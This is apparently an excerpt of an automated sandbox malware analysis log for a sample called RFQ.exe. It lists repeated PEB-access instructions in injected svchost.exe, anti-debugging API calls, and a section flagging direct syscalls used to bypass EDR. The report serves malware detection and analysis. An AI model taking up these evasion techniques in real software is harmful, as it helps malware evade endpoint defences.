                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]1_2_031325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]1_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]1_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]1_2_0312C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]1_2_031EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]1_2_0312645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]1_2_0315245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]1_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]1_2_031BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]1_2_031EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]1_2_031644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]1_2_031BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]1_2_031364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]1_2_031304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]1_2_03204B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]1_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]1_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]1_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]1_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]1_2_03128B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]1_2_031DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]1_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]1_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]1_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]1_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]1_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]1_2_031D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]1_2_0312CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]1_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]1_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]1_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]1_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]1_2_031DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]1_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]1_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]1_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]1_2_0315EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]1_2_031BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]1_2_031BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]1_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]1_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]1_2_0316CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]1_2_0315EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]1_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]1_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]1_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]1_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]1_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]1_2_031DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]1_2_03168A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]1_2_03204A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]1_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]1_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]1_2_03186AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]1_2_03130AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]1_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]1_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]1_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]1_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]1_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]1_2_031BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]1_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]1_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]1_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]1_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]1_2_031B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]1_2_031C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]1_2_031B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]1_2_03204940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]1_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]1_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]1_2_031BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]1_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]1_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]1_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]1_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]1_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]1_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]1_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]1_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]1_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]1_2_031649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]1_2_031FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]1_2_031C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]1_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]1_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]1_2_031BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]1_2_031BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]1_2_0316A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]1_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]1_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]1_2_03160854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134859 mov eax, dword ptr fs:[00000030h]1_2_03134859
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_006E0AA6
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006B25B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006B25B2
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A07BF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006A07BF
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A0955 SetUnhandledExceptionFilter,0_2_006A0955
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A0BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006A0BA1

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
